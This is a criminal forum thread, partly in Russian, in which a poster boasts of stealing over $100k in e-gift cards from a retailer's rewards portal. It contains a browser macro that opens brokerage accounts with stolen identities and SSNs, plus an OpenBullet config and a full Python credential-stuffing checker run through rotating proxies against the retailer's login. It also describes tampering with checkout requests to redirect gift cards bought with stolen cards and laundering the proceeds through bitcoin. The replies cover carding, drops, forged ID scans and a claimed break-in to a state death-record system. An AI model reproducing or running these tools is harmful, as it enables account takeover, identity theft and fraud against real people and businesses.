Статья How I exploited this corporation for $100k in 7 days

[tegranit]

зачетная статья

 

[astralded]

Forums are not what they used to be. Many of the places I have learned from have fallen, and been replaced more times than I can count. Unfortunately with each replacement of a forum the quality of participants becomes drastically lower and the barrier to entry is lowered as well. The way I approach any project is not because of some secret method I have found in some secret place that can only be found if someone is lucky enough to be given a link. My article on this project can be boiled down to just a few things which are quite trivial.

1. Burp suite ( or any mitm proxy that allows you to intercept and modify requests )
2. New programs/services/partnerships being announced in fields of my interest ( There are many blogs like the one I mentioned above that cover a wide variety up to date )
3. Don't assume defeat after their first or second patch attempt ( Devs overlook things and makes mistakes just like anyone. Even giant corporations like the one above )

If you are reading some guide somewhere from A to Z and intend to also follow that guide A to Z without bringing anything original to it afterward you can assume that 1000 others have been in front of you and have already reaped the worthwhile rewards most assume await them. I tended to look more at what others were doing and what was profitable that I could see for myself, especially services people offered which were popular and then figure out a way I could do it ( which usually is a different a way since you have to develop it yourself ). And many times it is not always pretty lol, but you are proud of it when it works and you can get improve from there.

Lol, one of my first projects that I offered as a service was years ago when I saw someone on mpgh ( english gaming forum with a market ) offering ░R░O░B░I░N░H░O░O░D░ free stock referrals for $5 each. I knew of the program as it had been around forever but what I really noticed was that his thread was only a couple days old with many many posts and very happy customers so I knew it was automated. He had no competition at the time there or anywhere so I decided I would figure out how to offer referrals as well but first how to automate it. I had no experience with this or even knew where to start so I played with many things that looked easiest to get going and came up with some really crappy result that involved 3 different programs working together, a free browser extension and this lol:

{
  "Name": "chrome",
  "CreationDate": "XXXX-XX-XX",
  "Commands": [
    {
      "Command": "open",
      "Target": "https://freestock.robinhood.com/XXXXXXX",
      "Value": ""
    },
    {
      "Command": "selectWindow",
      "Target": "TAB=CLOSEALLOTHER",
      "Value": ""
    },
    {
      "Command": "click",
      "Target": "//*[@id=\"content\"]/div[1]/div/div[2]/div/div[3]/a[1]",
      "Value": ""
    },
    {
      "Command": "csvRead",
      "Target": "fuel.csv",
      "Value": ""
    },
    {
      "Command": "type",
      "Target": "name=first_name",
      "Value": "${!COL1}"
    },
    {
      "Command": "type",
      "Target": "name=last_name",
      "Value": "${!COL2}"
    },
    {
      "Command": "type",
      "Target": "name=email",
      "Value": "${!COL3}"
    },
    {
      "Command": "type",
      "Target": "name=password",
      "Value": "${!COL4}"
    },
    {
      "Command": "click",
      "Target": "id=signup_continue",
      "Value": ""
    },
    {
      "Command": "type",
      "Target": "name=address",
      "Value": "${!COL5}"
    },
    {
      "Command": "type",
      "Target": "name=city",
      "Value": "${!COL6}"
    },
    {
      "Command": "type",
      "Target": "name=zipcode",
      "Value": "${!COL7}"
    },
    {
      "Command": "click",
      "Target": "name=phone_number",
      "Value": ""
    },
    {
      "Command": "type",
      "Target": "name=phone_number",
      "Value": "${!COL9}"
    },
    {
      "Command": "select",
      "Target": "name=state",
      "Value": "label=${!COL8}"
    },
    {
      "Command": "click",
      "Target": "//*[@id=\"signup_continue\"]",
      "Value": ""
    },
    {
      "Command": "pause",
      "Target": "4500",
      "Value": ""
    },
    {
      "Command": "click",
      "Target": "//*[@id=\"signup_continue\"]",
      "Value": ""
    },
    {
      "Command": "type",
      "Target": "name=birth_month",
      "Value": "${!COL10}"
    },
    {
      "Command": "type",
      "Target": "name=birth_day",
      "Value": "${!COL11}"
    },
    {
      "Command": "type",
      "Target": "name=birth_year",
      "Value": "${!COL12}"
    },
    {
      "Command": "type",
      "Target": "name=tax_id_ssn_1",
      "Value": "${!COL13}"
    },
    {
      "Command": "type",
      "Target": "name=tax_id_ssn_2",
      "Value": "${!COL14}"
    },
    {
      "Command": "type",
      "Target": "name=tax_id_ssn_3",
      "Value": "${!COL15}"
    },
    {
      "Command": "select",
      "Target": "name=citizenship",
      "Value": "value=US"
    },
    {
      "Command": "select",
      "Target": "name=marital_status",
      "Value": "value=single"
    },
    {
      "Command": "type",
      "Target": "/html/body/div[2]/div[2]/form/div[2]/div[1]/div[4]/div/input",
      "Value": "0"
    },
    {
      "Command": "select",
      "Target": "name=investment_experience",
      "Value": "value=no_investment_exp"
    },
    {
      "Command": "select",
      "Target": "name=employment_status",
      "Value": "value=student"
    },
    {
      "Command": "click",
      "Target": "//*[@id=\"signup_continue\"]",
      "Value": ""
    },
    {
      "Command": "pause",
      "Target": "4000",
      "Value": ""
    },
    {
      "Command": "click",
      "Target": "//*[@id=\"signup_continue\"]",
      "Value": ""
    },
    {
      "Command": "pause",
      "Target": "4550",
      "Value": ""
    },
    {
      "Command": "click",
      "Target": "/html/body/div[2]/div[2]/form/div[2]/div[2]/div/div/div[1]/a",
      "Value": ""
    },
    {
      "Command": "pause",
      "Target": "4600",
      "Value": ""
    },
    {
      "Command": "click",
      "Target": "/html/body/div[2]/div[2]/form/div[2]/div[2]/div/div/div[1]/div/div/a",
      "Value": ""
    },
    {
      "Command": "pause",
      "Target": "4000",
      "Value": ""
    },
    {
      "Command": "XClick",
      "Target": "xOw0VR_dpi_96.png",
      "Value": ""
    },
    {
      "Command": "pause",
      "Target": "3500",
      "Value": ""
    },
    {
      "Command": "XClick",
      "Target": "a4ChzB_dpi_96.png",
      "Value": ""
    },
    {
      "Command": "pause",
      "Target": "4000",
      "Value": ""
    },
    {
      "Command": "XClick",
      "Target": "FS1iTg_dpi_96.png",
      "Value": ""
    },
    {
      "Command": "pause",
      "Target": "8000",
      "Value": ""
    },
    {
      "Command": "click",
      "Target": "//*[@id=\"react_root\"]/div/main/div[2]/div/header/div/div[2]/div/div[2]/div[1]/div/a",
      "Value": ""
    },
    {
      "Command": "pause",
      "Target": "3000",
      "Value": ""
    },
    {
      "Command": "deleteAllCookies",
      "Target": "",
      "Value": ""
    }
  ]
}

This will no longer work as ░R░O░B░I░N░H░O░O░D░ has changed much including that accounts are not verified instantly on ssn alone anymore. But at the time it did even though it is childish crap and I was happy and able to pump out many referrals for people feeding it a csv with fullz in the proper format. I decided not to offer $5 referrals but instead for $200 I would max out the referrals on your account ( which was $500 ) and I took my service to reddit and other places which blew up and spawned eventually many copy cats and scammers etc.

So I think two people can visit the same forum but it matters most how that person is viewing what they read and their level of creativity as well as work ethic. Security researchers on twitter are good follows to, [̲̅K][̲̅r][̲̅e][̲̅b][̲̅s] is pretty much retired at this point and is not relevant anymore. Other than that just a good translator with limited interaction and poking around is what I've always done

Nice article, appreciate you taking time to write it down.
There are many articles of various skillset and themes, but it is important to share.
I really liked it as I also used to do something similar. Feel free to pm me for exchanging some ideas that could take your automation to another level.

Good job again and looking forward to more stories from you.

P.S. Krebs is dead, so he can rest in peace

 

[WhiteCollar]

терпение ключ к добродетели, отличная статья и мотивационное добро

 

[suerte]

Congratulations on the win, fella. I'd call this; when "thinking outside the box" has a baby with "staying consistent and persistent" type of thing. Thanks for sharing the story, I truly got low-key inspired to keep on learning and pushing forward.

If you don't mind, I'd like to ask a couple questions regarding the learning phase, as I consider myself a complete newbie in the field of python and other languages. I've got some minor experience when it comes to Linux, as well as I've done some carding in the past (which introduced me to the basic OpSec).

1. If you had to start from a complete 0 (knowledge, specifically), where'd you start off?
2. If we're talking Linux, which distro would you suggest to use?

By the way, don't judge me by the freshness of my account. This is literally my first time actually registering on this forum.

 

[ghostmarket09]

Congratulations on the win, fella. I'd call this; when "thinking outside the box" has a baby with "staying consistent and persistent" type of thing. Thanks for sharing the story, I truly got low-key inspired to keep on learning and pushing forward.

If you don't mind, I'd like to ask a couple questions regarding the learning phase, as I consider myself a complete newbie in the field of python and other languages. I've got some minor experience when it comes to Linux, as well as I've done some carding in the past (which introduced me to the basic OpSec).

1. If you had to start from a complete 0 (knowledge, specifically), where'd you start off?
2. If we're talking Linux, which distro would you suggest to use?

By the way, don't judge me by the freshness of my account. This is literally my first time actually registering on this forum.

Hi, I don't judge people on their registration dates because there are plenty of clowns and idiots who registered long ago lol. I have always tried to learn anything I can that makes me less dependent on others so that my projects do not require a partner. Partners in my opinion or group projects almost always have a person who is a weak link, or a liar/time waster. It didn't use to be this way but now it is. So I learn things like:

How to make my own scans with machine readable PDF417 barcodes ( Identity verifications for bank drops, various websites, android/ios apps https://github.com/transgen/Transgen )
How to make my own checkers ( Python is your friend I'm sure most would agree, also OB framework is newbie friendly and great to test if no experience https://github.com/openbullet/openbullet )
How to use a web proxy server that sits between your browser and target to intercept/modify traffic ( I use burp suite but there is also fiddler, mitmproxy ,etc https://github.com/SNGWN/Burp-Suite )
How to perform proper and fast recon ( Axiom is my current favorite framework because it allows true distributed scans of many tools easily making it VERY fast https://github.com/pry0cc/axiom )
How to check apk's for keys, vulns, dis etc ( https://github.com/MobSF/Mobile-Security-Framework-MobSF )

Those are my main daily tools/tasks I use. If I have a problem or something I don't know then I break the problem the down and look up the solutions until I understand. This usually involves many failures before success and understanding. I do post on forums asking people for solutions, and I never answer posts I see even if I know the answer. This used to be a sin on old forums and you were expected to exhaust the research on your own so it has stuck with me. Also there is no sense in helping someone learn something that I know can be searched for the answer because at the next road block they will simply quit and beg for answers again in an endless cycle.

I don't have a specific OS, all my vps are usually ubuntu, sometimes I use kali/parrot if I had vm open for specific reason and also windows 10 /server 2019.

I use an android emulator very often, lately its been Nox but I switch it up sometimes genymotion, android studio etc.

Sometimes I will find different things to practice on that most people arent doing. Especially verifications that are unique. Here is one I did last year for the electronic death registration system in Tennessee as a Doctor:

This allowed me to lookup and create new death certificates. Essentially I couldve electronically killed anyone in the USA lol. I actually still think things along these lines are interesting and would make a very interesting service perhaps. Because of USA laws and the way social security numbers work when someone is killed it is almost impossible to simply correct the mistake if they are found living or that it was a mistake. It also would potentially create possible loopholes when it comes to any legal troubles that person was facing making things like warrants more difficult to enforce, debts, etc. There is also a system for creating birth certificates and certifying them which would potentially allow you to simply create people out of thin air that are in the system. I got the idea originally from an Australian hacker.

 

[bigmoney916]

This article covers real ecommerce targets I exploited and how I bypassed their developers patches multiple times to continue my project


I apologize in advance for anyone having problems with English. I normally use a translator for private/business communications but since English is permitted here
and there are some details in this article that I do not trust to be translated correctly I will provide this in English. My attempt to translate would only insult
the language.


Please understand I am self taught in everything that I do and every field I pursue. I learn from Russian/German/English/Chinese forums and videos which I translate
as needed. I usually end up using a combination of everything that works for me, borrowing from many cultures and many techniques. I do not claim that my way is the best
or most efficient way and there are always ways to do things more efficiently. What I can show you is what I know and can prove actually works and what I
still actively do that works right now today and is not some outdated repost somebody stole. If you have advice on something you see and how to improve then consider
openly discussing your opinion in an adult manner with respect rather than make fake claims or live on assumptions because your world is so small.

Today I would like to share a project I developed at the end of last year with you. Anyone can follow along and I am happy to answer questions.

There are a lot of legitimate blogs, forums, and different websites I monitor daily to get inspired and find potential targets. One of these blogs is

??????????????.???

This post from that blog caught my eye last year (Click Me)

The reason it got my attention is because in the past I have worked with ????? and ????? points balances and I know the company very well. Many people know that ????? and ?????
are both owned by the same company transformco, and that you if you register at one website you can use the same credentials at the other and they work. But still many
people did not know that those login credentials will also work at a third website owned by transformco which is a rewards portal called ???????????.

??????????? itself has never been impressive, and ?????/????? cashout options using points had gotten worse and worse until eventually you could only use the balances for
crap nobody wanted. But that post above was telling everyone that ?????.??? would be partnering with ???????????.??? and that soon people would be able to cashout
their points for e-gift cards to hundreds of retailers. One user posted that they were currently running a pilot (trial) program and only certain targeted users would get an
email to come try it and report back any issues they experienced. Since I had worked with ?????/????? accounts before I had many thousands of old, spent accounts so I opened
their emails and started searching to see if any of them got a trial invite from ??????????? to try to the new giftcard exchange and I did!
Посмотреть вложение 24806


I followed the link to ???????????.???/????????? logged in and saw the promotional $10 credit. I chose a gift card and checked out where it let me choose
to send to my own email or input someone elses to send the egift as a present. After checking out I instantly had to egift in my email.

Посмотреть вложение 24809

At this point in the story I couldve never guessed where this would lead. So lets analyze where my head is at during this point.

1. There is a program being tested that a very small amount of people are invited to try and you are only allowed to convert the promo $10 balance they put in your account.
2. Even though one of my accounts got an invite and the system works there is never a guarantee it even goes live, or even if it does nobody knows when it will.
3. I always have multiple projects going and I'm more concerned with what is paying now.

I decide this project is not exciting to me at the moment but that I would still gather accounts with balances for another time. I used Openbullet 1.2.2 and also a python standalone to crack accounts.
This is outdated now and will no longer work but it might help someone to get an idea. These would email:pass combos and save accounts with $20+ balances into hits.txt. First is the OB config loli script, second is the standalone python and req's:

FUNCTION RandomString "?d?d?d" -> VAR "3"

FUNCTION GetRandomUA -> VAR "UA"

REQUEST GET "https://sso.shld.net/shccas/usr/regEnroll.htm?_flowId=regEnroll-flow&clienthost=www.kmart.com&target=https%3A%2F%2Fwww.kmart.com%2F%3FstoreId%3D10151%26catalogId%3D10104&sid=4&modifyservice=true&irp=true&xdm_e=https%3A%2F%2Fwww.kmart.com&xdm_c=default7441&xdm_p=1<3>"
 
  SECPROTO TLS11
  HEADER "Host: sso.shld.net"
  HEADER "Connection: keep-alive"
  HEADER "Upgrade-Insecure-Requests: 1"
  HEADER "User-Agent: <UA>"
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"
  HEADER "Sec-Fetch-Site: none"
  HEADER "Sec-Fetch-Mode: navigate"
  HEADER "Sec-Fetch-User: ?1"
  HEADER "Sec-Fetch-Dest: document"
  HEADER "Accept-Encoding: gzip, deflate, br"
  HEADER "Accept-Language: en-US,en;q=0.9"

REQUEST POST "https://sso.shld.net/shccas/usr/loginhandler.htm"
  CONTENT "loginId=<USER>&logonPassword=<PASS>&sourceSiteId=4&service=https%3A%2F%2Fwww.kmart.com%2FUSRLogon%3FstoreId%3D10151%26catalogId%3D10104%26langId%3D-1&redirectUrl=https%3A%2F%2Fwww.kmart.com%2F%3FstoreId%3D10151%26catalogId%3D10104&modifyservice=true&sywLogin=true&shcKey=undefined&shcResponse=0000&tncmodal=false&clienthost=www.kmart.com&renew=true&sywmax=&irp=true"
  CONTENTTYPE "application/x-www-form-urlencoded"
  SECPROTO TLS11
  HEADER "User-Agent: <UA>"
  HEADER "Pragma: no-cache"
  HEADER "Accept: text/html, */*; q=0.01"
  HEADER "authority: sso.shld.net"
  HEADER "origin: https://sso.shld.net"
  HEADER "referer: https://sso.shld.net/shccas/usr/regEnroll.htm?_flowId=regEnroll-flow&clienthost=www.kmart.com&target=https%3A%2F%2Fwww.kmart.com%2F%3FstoreId%3D10151%26catalogId%3D10104&sid=4&modifyservice=true&irp=true&xdm_e=https%3A%2F%2Fwww.kmart.com&xdm_c=default7441&xdm_p=1<3>"

KEYCHECK
  KEYCHAIN Success OR
    KEY "name=\""
  KEYCHAIN Failure OR
    KEY "Sorry, we didn't recognize that email and password combination"
    KEY "Sorry, your credentials have expired"
  KEYCHAIN Custom "2FACTOR" OR
    KEY "Sorry, you've made too many login attempts and your account has been locked"

PARSE "<SOURCE>" LR "name=\"serviceURL\" value=\"" "\"/>" -> VAR "URL"

REQUEST GET "<URL>"
 
  HEADER "User-Agent: <UA>"
  HEADER "Pragma: no-cache"
  HEADER "Accept: text/html, */*; q=0.01"
  HEADER "authority: sso.shld.net"
  HEADER "origin: https://sso.shld.net"
  HEADER "referer: https://sso.shld.net/shccas/usr/regEnroll.htm?_flowId=regEnroll-flow&clienthost=www.kmart.com&target=https%3A%2F%2Fwww.kmart.com%2F%3FstoreId%3D10151%26catalogId%3D10104&sid=4&modifyservice=true&irp=true&xdm_e=https%3A%2F%2Fwww.kmart.com&xdm_c=default7441&xdm_p=1<3>"

REQUEST GET "https://www.kmart.com/universalprofile/customerinfo"
 
  SECPROTO TLS12
  HEADER "dnt: 1"
  HEADER "referer: https://www.kmart.com/?storeId=10151&catalogId=10104"
  HEADER "sec-fetch-dest: empty"
  HEADER "sec-fetch-mode: cors"
  HEADER "sec-fetch-site: same-origin"
  HEADER "user-agent: <UA>"
  HEADER "x-requested-with: XMLHttpRequest"

PARSE "<COOKIES(cust_info)>" LR "" "" -> VAR "Points"

FUNCTION URLDecode "<Points>" -> VAR "Points"

PARSE "<Points>" JSON "pointsDollar" CreateEmpty=FALSE -> CAP "Dollars"

KEYCHECK BanOnToCheck=FALSE
  KEYCHAIN Custom "CUSTOM" OR
    KEY "<Dollars>" LessThan "20"
    KEY "<Dollars>" DoesNotExist

This is the python script and reqs.

import random
from easygui import fileopenbox
from concurrent.futures import ThreadPoolExecutor
from multiprocessing.dummy import Pool
import time
from time import sleep
import re
from threading import Thread, Lock
from os import system
import os
import string
from subprocess import check_output
from random_user_agent.user_agent import UserAgent
from random_user_agent.params import SoftwareName, OperatingSystem
from urllib.parse import unquote
import json
import sys

clear = lambda: os.system('cls')
system('title '+ 'KMART - Checking [0/0] - Hits: 0 - Bad: 0 - CPM: 0')


BLUE = '\33[94m'
LightBlue = '\033[94m'
RED = '\033[91m'
WHITE = '\33[97m'
YELLOW = '\33[93m'
GREEN = '\033[32m'
Magenta  = "\033[35m"
LightCyan    = "\033[96m"
END = '\033[0m'

if len(sys.argv) < 2:
    sys.stdout.write(RED + """

                                    ██╗  ██╗     ███╗   ███╗ █████╗ ██████╗ ████████╗
                                    ██║ ██╔╝     ████╗ ████║██╔══██╗██╔══██╗╚══██╔══╝
                                    █████╔╝█████╗██╔████╔██║███████║██████╔╝   ██║ 
                                    ██╔═██╗╚════╝██║╚██╔╝██║██╔══██║██╔══██╗   ██║ 
                                    ██║  ██╗     ██║ ╚═╝ ██║██║  ██║██║  ██║   ██║ 
                                    ╚═╝  ╚═╝     ╚═╝     ╚═╝╚═╝  ╚═╝╚═╝  ╚═╝   ╚═╝ 
                                                      

    \n""")
input(YELLOW+"[+] "+RED+"Press Any Key To Start.......")

threads = input(YELLOW+"[+] "+RED+"Threads: ")
pchoice = int(input(YELLOW+"[+] "+RED+"(1. HTTP|2. SOCKS4| 3.SOCKS5): "))
if pchoice == 1:
    proxytype = 'http'
elif pchoice == 2:
    proxytype = 'socks4'
elif pchoice == 3:
    proxytype = 'socks5'
else:
    proxytype = 'http'

stopstuff = True
comboloader = []
proxyloaderloader = []
combolist = []
proxylist = []

software_names = [SoftwareName.CHROME.value]
operating_systems = [OperatingSystem.WINDOWS.value, OperatingSystem.LINUX.value] 

class Counter:
    checked = 0
    hits = 0
    bad = 0
    cpm = 0

comboloader = open(fileopenbox(title="Load Combo List", default="*.txt"), 'r', encoding="utf8",
                                      errors='ignore').read().split('\n')

combolist = [x.strip() for x in comboloader if ":" in x and x != '']

proxyloader = open(fileopenbox(title="Load Proxy List", default="*.txt"), 'r', encoding="utf8",
                                      errors='ignore').read().split('\n')

proxylist = [x.strip() for x in proxyloader if ":" in x and x != '']

print(f"{YELLOW}[+] {RED}{len(combolist)} Combos Loaded")
print(f"{YELLOW}[+] {RED}{len(proxylist)} Proxies Loaded")
print(YELLOW+"[+] "+RED+"Starting Engine......\n\n\n")

def getua():
    user_agent_rotator = UserAgent(software_names=software_names, operating_systems=operating_systems, limit=1000)
    user_agent = user_agent_rotator.get_random_user_agent()
    return user_agent



def checkmc(line):
    while True:
        if ':' in line:
            email, password = line.split(':', 1)
            currentproxy = random.choice(proxylist)
            if currentproxy.count(':') == 3:
                spl = currentproxy.split(':')
                currentproxy = f'{spl[2]}:{spl[3]}@{spl[0]}:{spl[1]}'
            else:
                currentproxy = currentproxy

            if proxytype in ['https', 'http']:
                proxy_form = {'http': f"http://{currentproxy}", 'https': f"https://{currentproxy}"}
            elif proxytype in ['socks4', 'socks5']:
                pline = f"{proxytype}://{currentproxy}"
                proxy_form = {'http': pline, 'https': pline}


            session = requests.sessions.Session()
            session.proxies = proxy_form

            try:

                three = "".join(random.choices(string.digits, k=3))

                UA = getua()

                page1 = f'https://sso.shld.net/shccas/usr/regEnroll.htm?_flowId=regEnroll-flow&clienthost=www.kmart.com&target=https%3A%2F%2Fwww.kmart.com%2F%3FstoreId%3D10151%26catalogId%3D10104&sid=4&modifyservice=true&irp=true&xdm_e=https%3A%2F%2Fwww.kmart.com&xdm_c=default7441&xdm_p=1{three}'
                h1 = {"User-Agent": f"{UA}", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate, br", "Accept-Language": "en-US,en;q=0.9"}
                h1.update({'Content-Type': 'application/x-www-form-urlencoded'})

                session.get(page1, headers=h1, timeout=4)


                page2 = f'https://sso.shld.net/shccas/usr/loginhandler.htm'
                h2 = {"User-Agent": f"{UA}", "Accept": "text/html, */*; q=0.01", "authority": "sso.shld.net", "origin": "https://sso.shld.net", "referer": f"https://sso.shld.net/shccas/usr/regEnroll.htm?_flowId=regEnroll-flow&clienthost=www.kmart.com&target=https%3A%2F%2Fwww.kmart.com%2F%3FstoreId%3D10151%26catalogId%3D10104&sid=4&modifyservice=true&irp=true&xdm_e=https%3A%2F%2Fwww.kmart.com&xdm_c=default7441&xdm_p=1{three}"}
                h2.update({'Content-Type': 'application/x-www-form-urlencoded'})
                data2 = f'loginId={email}&logonPassword={password}&sourceSiteId=4&service=https%3A%2F%2Fwww.kmart.com%2FUSRLogon%3FstoreId%3D10151%26catalogId%3D10104%26langId%3D-1&redirectUrl=https%3A%2F%2Fwww.kmart.com%2F%3FstoreId%3D10151%26catalogId%3D10104&modifyservice=true&sywLogin=true&shcKey=undefined&shcResponse=0000&tncmodal=false&clienthost=www.kmart.com&renew=true&sywmax=&irp=true'

                r2 = session.post(page2, data=data2, headers=h2, timeout=4).text




                if 'Sorry, we didn\'t recognize that email and password combination' in r2:
                    Counter.bad += 1
                    Counter.checked += 1
                    session.close()
                    break
                elif 'Sorry, your credentials have expired' in r2:
                    Counter.bad += 1
                    Counter.checked += 1
                    session.close()
                    break
                elif 'Sorry, you\'ve made too many login attempts and your account has been locked' in r2:
                    Counter.bad += 1
                    Counter.checked += 1
                    session.close()
                    break
                elif 'name="' in r2:

                    URL = re.search('name="serviceURL" value="(.*?)"', r2).group(1)
                    h3 = {"User-Agent": f"{UA}", "Accept": "text/html, */*; q=0.01", "authority": "sso.shld.net", "origin": "https://sso.shld.net", "referer": f"https://sso.shld.net/shccas/usr/regEnroll.htm?_flowId=regEnroll-flow&clienthost=www.kmart.com&target=https%3A%2F%2Fwww.kmart.com%2F%3FstoreId%3D10151%26catalogId%3D10104&sid=4&modifyservice=true&irp=true&xdm_e=https%3A%2F%2Fwww.kmart.com&xdm_c=default7441&xdm_p=1{three}"}
                    h3.update({'Content-Type': 'application/x-www-form-urlencoded'})
                    session.get(URL, headers=h3, timeout=4)


                    h4 = {"dnt": "1", "referer": "https://www.kmart.com/?storeId=10151&catalogId=10104", "sec-fetch-dest": "empty", "sec-fetch-mode": "cors", "sec-fetch-site": "same-origin", "user-agent": f"{UA}", "x-requested-with": "XMLHttpRequest", 'Content-Type': 'application/x-www-form-urlencoded'}
                    r4 = session.get('https://www.kmart.com/universalprofile/customerinfo', headers=h4, timeout=4)

                    cook = str(r4.headers)

                    points = re.search('cust_info=(.*?);', cook).group(1)

                    punencoded = requests.utils.unquote(points)

                    dollars = re.search('pointsDollar":(.*?),', punencoded).group(1)


                    if float(dollars) < 20.0:
                        with open('custom.txt', 'a', encoding='utf8') as ps:
                            ps.write(f"{line} | Dollars: {dollars}\n")
                    else:
                        with open('hits.txt', 'a', encoding='utf8') as ps:
                            ps.write(f"{line} | Dollars: ${dollars}\n")


                    Counter.hits += 1
                    Counter.checked += 1
                    mylock.acquire()
                    print(f'{YELLOW}[+] {Magenta}~ {GREEN}{line} | Dollars: {GREEN}${dollars}')
                    mylock.release()
                    session.close()
                    break
                else:
                    session.close()
                    continue
            except:
                session.close()
                continue
        else:
            Counter.bad += 1
            Counter.checked += 1
            break

def title():
    while True:
        system('title '+ f'KMART - Checking [{Counter.checked}/{len(combolist)}] - Hits: {Counter.hits} - Bad: {Counter.bad} - CPM: {Counter.cpm}')


def cpm_counter():
        while True:
            if Counter.checked >= 1:
                now = Counter.checked
                sleep(3)
                Counter.cpm = (Counter.checked - now) * 20

Thread(target=cpm_counter, daemon=True).start()
mylock = Lock()
Thread(target=title).start()
mainpool = Pool(processes=int(threads))
mainpool.imap_unordered(func=checkmc, iterable=combolist)
mainpool.close()
mainpool.join()
stopstuff = False

print("Done Checking.........")
input()

I collect many many accounts automatically for quite a while until I store them and forget about them.... Until one day I notice an update on the blog above I mentioned. Someone had posted to inform others that the giftcard exchange program had gone live and now all ??????????? customers could exchange their point balances for gift cards.

I immediately broke out of my stashed accounts and started cashing them out one by one and since they allowed you to input another email at the checkout page if you wanted to send it as a gift so I chose that since I didnt have email access to these accounts and wouldnt be able to retrieve the gift cards if they were sent only to there. Unfortunately this didnt last before they had to make some changes. One day I tried to begin cashing out again and found they had patched the checkout page so that you did not have the ability to send as a gift or alter the email address field. I tried going to the profile page on the account to change the email address there but they had already closed that possibility. Then I remembered these credentials work on ????? and ????? too so first I tried ????? but they had disabled it, and then I tried ????? which they had not fixed!

So I set about my project again cashing out but also adding an extra step now =( This lasted 1 day before they fixed that also. I was thinking of moving on until I decided to try and intercept the traffic at checkout, modify the email address being posted in the request and forwarding it to see if it would allow it. And it did!

Посмотреть вложение 24808

At this point they had also introduced a new feature during checkout. Not only could you use your points to get giftcards but they now put in a payment processor so you could use your credit card to pay for your gift card if the total was more than your point balance. After some quick testing I quickly realized balances on the accounts would no longer be necessary......

Посмотреть вложение 24811Посмотреть вложение 24812



At this point I understood the payment processor had little to no fraud security, I didn't even need to use different accounts. I could just one on account and keep purchasing egift cards, intercepting the traffic ith burp and changing email to any email, and it would be delivered there. then when cvv being used was empty I could simply use the next one on the same account and keep pushing out e gift cards to any email from one single account over and over.

Посмотреть вложение 24814Посмотреть вложение 24815





I got tens of thousands of dollars $100k+ in Sephora, Walmart, Razer, Saks 5th avenue, Autozone, Nike, and so many more instantly delivered. What was a little side project to cashout some accounts with balances turned into me essentially being able to issue unlimited e gifts from 100s of different retailers from one one portal.

I instantly converted them all to bitcoin through paxful with the chinese who are very happy to find reliable bulk supplier and pay 80%+

Посмотреть вложение 24816



Посмотреть вложение 24817

Ive never written anything like this so hope its acceptable and hope someone gets an idea that helps them with their projects.

HaHa Good job on that one. like to hear about raping something even if not by my own hand... reminds me of my weekend run with M&T and zelle. in the beginning they would shoot for 2500 and not even flinch. bought every m&t i could find collected about 70 and then started. after the first day they restricted from anything except mobile device. that lasted about 10 minutes. then they dropped the amount that would send all the way down to $20. anything else would fail. but still had same limit of 2500 total. lol.... not anymore

 

[Supermaxout]

Если бы было что-то, о чем вы хотели бы знать, когда только начинали, что бы это было?

If there was something you wished you had known about when you first started, what would it have been?

 

[ghostmarket09]

If there was something you wanted to know about when you first started, what would it be?

If there was something you wished you had known about when you first started, what would it have been?

In the beginning ( 2008-2009 for me ) I wanted to know about everything lol but this was not an option then. Forums/Communities were not as simple to enter back then, and even after entering nobody would respect you or trust you if you were not known. So I like many others followed what used to be the clear path if you were from the west- Canada, USA etc, I started picking up drops ( package, signature, commercial, billing, etc ). After being vouched enough I was given an opportunity by another for instore carding. Preprinted plastic was sent to me along with 101 bases, I had to purchase my own embosser and msr, and instead of foil tipper at first I used metallic marker lol. In both of these fields there was a lot of selling involved at the end of the day but was not a problem since I travelled and was always in major cities.

I was given d+p opportunities after that from a legend out of ukraine and this I did quite a while. There were many things in between all of these things, back when reloading gc's online with cvv was much easier and common and instant e-gcs were more common. Lord and taylor my partner and I killed so bad one winter holiday in chicago they changed their system, lol, L'occitane, and so many other old things people dont know of. Had a great polish friend who was called aldo that disappeared who had corrupt employee at kmart corporate which was when i first learned sears/kmart were owned by same company and gift cards could be used at both, that employee sent me $7k of e gifts daily for $1.5k WU for a long time until he got fired i assume.

Many scams on lesser known sites like auctionarms and gunbrokers that are too long to explain. Too much to list but the point being I always wanted to understand and figure out anything. My problem has always been that I lose interest when I reach that point and move on, even when that project is working very well lol. My attention span and work ethic is great as long as the work is challenging/entertaining but once there are no problems to solve or figure out I goto the next thing. I grew up with a father who was a programmer, so basic interests were always in this field because of him. I have mastered nothing lol, but I have a working understanding about more than youd believe haha.

I took a break for 5-7 years and when I came back the people I knew were gone and the communities were much different, just like now. There were many legends then, bx1, Max Ray Vision, N2C, BadB, and many dangerous talent unlike now where most pretend theyre legends but know little about nothing. Just as boring to me are those people who are SUPER PERFECT EXPERTS in a single field but have almost no understanding about anything else... I don't see the logic in this and these paths lead always to being dependent at some point. There is a real shortage of creativity these days so if you have it then use it because its valuable.


As far as what I wish I'd known when I started. I wish I'd known that if you manage to become successful that those you love, and those closest to you might become hateful and resentful and eventually dangerous and cost you years of your life. Even though you are taking care of them, sharing with them, and consider all your wins as group wins... sometimes it doesnt matter and there is just something bad in most people. Sisters, brothers, girlfriends, doesnt matter.

 

[suerte]

I was about to quote your reply to my post until I noticed your answer to the guy above. Ghost, even though I'm repeating here, you should know for a fact that you're a quite inspiring individual. As I read through, I can tell that you're the type to be able to tell what the person is like, what they feel like just by their facial expressions, the way their eyes shift, basically - a body language expert thanks to the experience with all types of mainly negative situations in your life. Believe me or not, but I absolutely understand you. I grew up on the streets and they taught me a lot. Especially, about people. It's not just songs and movies, people will actually switch up on you, tell on you, betray you if you don't give them a piece of your success. I learned about "let your results speak instead of you" when I noticed how people around me were reacting to me finally making a positive change in my life. It was so irritating. Even the family members: "Oh, this doesn't work. That won't last. You didn't see the news? Not going to work. You can try but it's pointless.", what in the living fuck, right? Aren't they supposed to be on your side?

But nah, this is not how the world works. At least, not this world. I often judge myself for not getting people involved in my work, in my schemes, etc. But on the other hand, I've got a reason for it. I've been trying to educate my people, showing them my ideas, talking about other and underrated perspectives of different subjects, passing the connections that I've been working to get for so long - just for free, just so they can be happy and use them wisely. But in reality, they don't appreciate that shit and often, fuck shit up.

That's where I understand your will to work solo, because there are weak, disloyal, unmotivated and envy people around. Most of them. While you're chasing loyalty like an idiot - people are chasing the paper, which is even dumber.

